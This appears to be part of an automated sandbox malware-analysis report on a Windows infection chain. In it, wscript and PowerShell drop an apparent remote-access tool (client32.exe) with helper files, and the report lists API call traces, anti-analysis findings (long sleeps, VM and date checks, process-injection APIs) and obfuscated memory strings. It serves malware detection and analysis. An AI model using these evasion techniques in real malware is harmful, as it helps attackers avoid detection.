Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId, 10_2_110C1020
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11113380 IsIconic,GetTickCount, 10_2_11113380
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos, 10_2_110CB750
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos, 10_2_110CB750
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA, 10_2_111236E0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA, 10_2_111236E0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer, 10_2_11025A90
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop, 10_2_1115BAE0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop, 10_2_1115BAE0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt, 10_2_11113FA0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId, 10_2_11025EE0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows, 10_2_1115BEE0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer, 10_2_110241A0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11024880 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId, 10_2_11024880
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary, 10_2_11029BB0
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_6CA891F0 10_2_6CA891F0
Delayed program exit found
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110B86C0 Sleep,ExitProcess, 10_2_110B86C0
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1635 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8251 Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Window / User API: threadDelayed 393 Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Window / User API: threadDelayed 8099 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\remcmdstub.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\TCCTL32.DLL Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL Jump to dropped file
Found evaded block containing many API calls
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Evaded block: after key decision
Found evasive API chain (date check)
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Evasive API call chain: GetLocalTime,DecisionNodes
Found evasive API chain checking for process token information
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe API coverage: 7.3 %
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_6CA891F0 10_2_6CA891F0
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 400 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe TID: 5632 Thread sleep time: -62000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe TID: 4020 Thread sleep time: -39300s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe TID: 5632 Thread sleep time: -2024750s >= -30000s Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Last function: Thread delayed
Uses the system / local time for branch decision (may execute only at specific dates)
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_6CA93130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6CA93226h 10_2_6CA93130
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle, 10_2_111273E0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess, 10_2_1102D9F4
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess, 10_2_1102DD21
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose, 10_2_1110BD70
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA, 10_2_110663B0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError, 10_2_1106ABD0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: HTCTL32.DLL.8.dr Binary or memory string: VMware
Source: wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PDuBqHlSjfaVBDljTqJqWwFvbyyYxZZCDHswZoXzfiRzqceWjecZmjqgnptSIHaqnCXIzYoKTXqRGLtxllycZdMCKnMRTfTfsAZHjDGmKpuzSQIiYPHJSPpQYsWysXIPUVifMnfPvGLyMfTgshOjQCIanDeTRUsMkGWyAGJtvEpjqczQOLxKFRBNnXTsOrAofFlTAQWFWJjkyYNSfcoNAptziWrqsxamtFHcFWLWFhutsZHMlpqciouqTJteqqmnxengSfwNrqjvRvnwyeeLliSvcaXJOVmMGYkALPiTFVBHCkjuKbGJlgbZuyCFqdVkRgDViFOGJhYlwKygomLINmgRDtlKaRTEEFxNZOCYJTAMdPOhzpcyQLLROPndlsbXpzXZwgxnFcMKoLMeCfAxujbcQuPyByLRZVbJJzvSwkMuKOevWjDDBlOfBNYOEzyLriAaLxupslqNYsqSRZvguXeuootrrbMgOaiEcMnERuqauhkUjnHPdhelIcJwLkYTwWWEHMYzbaTQrqIfvjkNqjwPeYvWDKWcrouaVhIPTDlzatNyKyhHPUUHHsVEvcYafrsrMaWzSGxyhIXlYPvsfCwskecJgoGXDfXjCxcdrgaWlxkEQQAfibyEgRJGXEAWEiPveLpJKfyzltKBsyWxKjbGHHRDDkIsBhYIZQKWbyZJwZqnOCcPqNlYPklUPYBLauMligHZpgSttJHkqZqDNuRdOgJFyicaZyrACqijTHDVNXCQqQzPYFjyCFlLEAaUZYOtQBYvFAqsSTmSYnkfkzgMWqFUZXoTRBFzpWwpvyjhiQhgpOuxfCWxzafCNaAfhsuoWCTnrrAKAAskRsYFWGHiZjhRyKgkFABzDYIkkIFPZbJtlIQSoMSqbJWZnWFNRRsnmgRbxSpTdmqYBmqMxUddsaOcyREuoCdPKkrXyRuUtkIsIxgetNUvGkSIDOiaMNbeWMOrNvayRYaIdtBLdKOGyiDSEZlGzHhPxOKVdExlQqlpoZsFWqhPwFqesgPEINDsGcMTXODNTkZtIAQUvNrkkbiixVaFZQLGVGJeMKeDPpsvvSbMwSFQmkqjvDbByOuPaeVDFERfpAJCRSJJzchlkIfWgXnHDIRKHCsiVSmGEgNhVkIPqUrlZIBuwBZXGiTIOxIFaYhgsWsLyfOfPBjfXJhIlnMvckylHikUfURHflPjXOGGMLzlOWEcCXDwkBIZkBOTdqTshrNFfvsnifppkahlOkpGpHvvttjjiQJeSSXVMhMdLTdubCpXtyJFGIHwswLEXSGvvnfgZFOzESEePpLVEdahceGxirGantREzNXYLrxQxvvDNFCAzzDVEHTdSuWIHAKTMbpyuAPqpoxOIRGTKJZHxVIiMorMCzWfwegjeUDIvuDbfNSqvdLFyCxVKsjmNaPsVTxbhvBPxqCLDTJsiuLfNtRlsEiWdRjCclGFyPaDuNqLGDuMWUXmDvseghDVZxfzgawcDJNCqIBCpzhYriTwASvvCEIJQVNAXlPORcVxtTkZHwcDReEluWtHbBxbayANwMXrkEVwEUDTuvDGiWtPkxpFleOjiyjWDEpoICeZomWLvPaOGVHdzfwObZPtbkANeyqPUndSEotGFOsZNWqtDAUZJDHSVCcbXkMOFXCdRSKDoXyUpLhHsxhLZFMexaYIbDdGidpCQUbXEFIANKIPzlCHCNRrSlKOoBciNvBaCiKolfbzaiPlhChNmHsnkgfefeECaAQjaVPsZYzYIUkIZuOjphCfVIGDcwfazQByQJfBaPjLGEAVdxWEVoJiAuXmbIvLRrdpYGvSjgrSSKrTqYWJhlBhGCeJgTesAPUWyOLwDqepbFeZUOrfNiUuvEZyOamtngXLlNXwNOTLoPWBGWCmhDqtapCuAdwVlzZGIECrrCDtFsBEsTDUiGxBRrTOOdDTKOJiPvuLlEcvYavDYOwsSvWgwPldeeGtELvCLVFEtzkidfPutHWbUJhQcNgAohGFsSOdHlwBJWKOgGoSEQxoHXxMEmceyunawzTXuATqyKuBS
Source: HTCTL32.DLL.8.dr Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CKnMRTfTfsAZHjDGmKpuzSQIiYPHJSPpQYsWysXIPUVifMnfPvGLyMfTgshOjQCIanDeTRUsMkGWyAGJtvEpjqczQOLxKFRBNnXTsOrAofFlTAQWFWJjkyYNSfcoNAptziWrqsxamtFHcFWLWFhutsZHMlpqciouqTJteqqmnxengSfwNrqjvRvnwyeeLliSvcaXJOVmMGYkALPiTFVBHCkjuKbGJlgbZuyCFqdVkRgDViFOGJhYlwKygomLINmgRDtlKaRTEEFxNZOCYJTAMdPOhzpcyQLLROPndlsbXpzXZwgxnFcMKoLMeCfAxujbcQuPyByLRZVbJJzvSwkMuKOevWjDDBlOfBNYOEzyLriAaLxupslqNYsqSRZvguXeuootrrbMgOaiEcMnERuqauhkUjnHPdhelIcJwLkYTwWWEHMYzbaTQrqIfvjkNqjwPeYvWDKWcrouaVhIPTDlzatNyKyhHPUUHHsVEvcYafrsrMaWzSGxyhIXlYPvsfCwskecJgoGXDfXjCxcdrgaWlxkEQQAfibyEgRJGXEAWEiPveLpJKfyzltKBsyWxKjbGHHRDDkIsBhYIZQKWbyZJwZqnOCcPqNlYPklUPYBLauMligHZpgSttJHkqZqDNuRdOgJFyicaZyrACqijTHDVNXCQqQzPYFjyCFlLEAaUZYOtQBYvFAqsSTmSYnkfkzgMWqFUZXoTRBFzpWwpvyjhiQhgpOuxfCWxzafCNaAfhsuoWCTnrrAKAAskRsYFWGHiZjhRyKgkFABzDYIkkIFPZbJtlIQSoMSqbJWZnWFNRRsnmgRbxSpTdmqYBmqMxUddsaOcyREuoCdPKkrXyRuUtkIsIxgetNUvGkSIDOiaMNbeWMOrNvayRYaIdtBLdKOGyiDSEZlGzHhPxOKVdExlQqlpoZsFWqhPwFqesgPEINDsGcMTXODNTkZtIAQUvNrkkbiixVaFZQLGVGJeMKeDPpsvvSbMwSFQmkqjvDbByOuPaeVDFERfpAJCRSJJzchlkIfWgXnHDIRKHCsiVSmGEgNhVkIPqUrlZIBuwBZXGiTIOxIFaYhgsWsLyfOfPBjfXJhIlnMvckylHikUfURHflPjXOGGMLzlOWEcCXDwkBIZkBOTdqTshrNFfvsnifppkahlOkpGpHvvttjjiQJeSSXVMhMdLTdubCpXtyJFGIHwswLEXSGvvnfgZFOzESEePpLVEdahceGxirGantREzNXYLrxQxvvDNFCAzzDVEHTdSuWIHAKTMbpyuAPqpoxOIRGTKJZHxVIiMorMCzWfwegjeUDIvuDbfNSqvdLFyCxVKsjmNaPsVTxbhvBPxqCLDTJsiuLfNtRlsEiWdRjCclGFyPaDuNqLGDuMWUXmDvseghDVZxfzgawcDJNCqIBCpzhYriTwASvvCEIJQVNAXlPORcVxtTkZHwcDReEluWtHbBxbayANwMXrkEVwEUDTuvDGiWtPkxpFleOjiyjWDEpoICeZomWLvPaOGVHdzfwObZPtbkANeyqPUndSEotGFOsZNWqtDAUZJDHSVCcbXkMOFXCdRSKDoXyUpLhHsxhLZFMexaYIbDdGidpCQUbXEFIANKIPzlCHCNRrSlKOoBciNvBaCiKolfbzaiPlhChNmHsnkgfefeECaAQjaVPsZYzYIUkIZuOjphCfVIGDcwfazQByQJfBaPjLGEAVdxWEVoJiAuXmbIvLRrdpYGvSjgrSSKrTqYWJhlBhGCeJgTesAPUWyOLwDqepbFeZUOrfNiUuvEZyOamtngXLlNXwNOTLoPWBGWCmhDqtap